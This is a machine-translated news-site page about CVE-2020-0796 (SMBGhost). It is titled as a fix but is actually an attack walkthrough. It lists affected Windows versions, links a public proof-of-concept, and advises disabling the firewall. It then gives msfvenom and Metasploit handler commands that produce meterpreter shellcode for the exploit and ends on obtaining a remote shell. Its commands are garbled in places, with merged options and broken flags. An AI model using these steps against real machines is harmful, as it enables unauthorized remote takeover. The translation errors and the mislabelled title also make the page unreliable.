How to resolve the CVE-2020-0796 RCE vulnerability 04/01 Update SLTechnology News&Howtos

How to resolve the CVE-2020-0796 RCE vulnerability

2025-04-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to analyze the CVE-2020-0796 RCE loophole. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

Introduction of loopholes

Microsoft SMBv3 Client/Server remote code execution vulnerability CVE-2020-0796

Scope of influence:

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)

Reproduce potholes: take a look at more potholes

EXP address:

Https://github.com/chompie1337/SMBGhost_RCE_PoC

The version of Win10 is limited. I used the following successful version

Download address

Python version

Python 3.6 can be successful!

Python 3.7 and 2 measured blue screen

I don't know why, but there is a boss who knows that he can guide his brother.

Payload needs forward listening.

There are also holes in the patch. There is no KB4551762 reason, but there are only a few patches in win10, but that patch may contain this patch.

Need to turn off defender Firewall

Recurrence process

First take a look at the patch (KB4551762) using systeminfo

It's new. I'm sure there's nothing wrong with it.

Msf generates Trojan Horse

Msfvenom-p windows/x64/meterpreter/bind_tcp LPORT=4444-b'\ x00'-I 1-f python

EXP replaces shellcode

Replace buf with USER_PAYLOAD

Use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcpset lport 6666set rhost 192.168.31.235run

Run EXP

Python3 exploit.py-ip 192.168.100.54

Finally got the shell.

The above is the editor for you to share how to analyze the CVE-2020-0796 RCE loophole, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.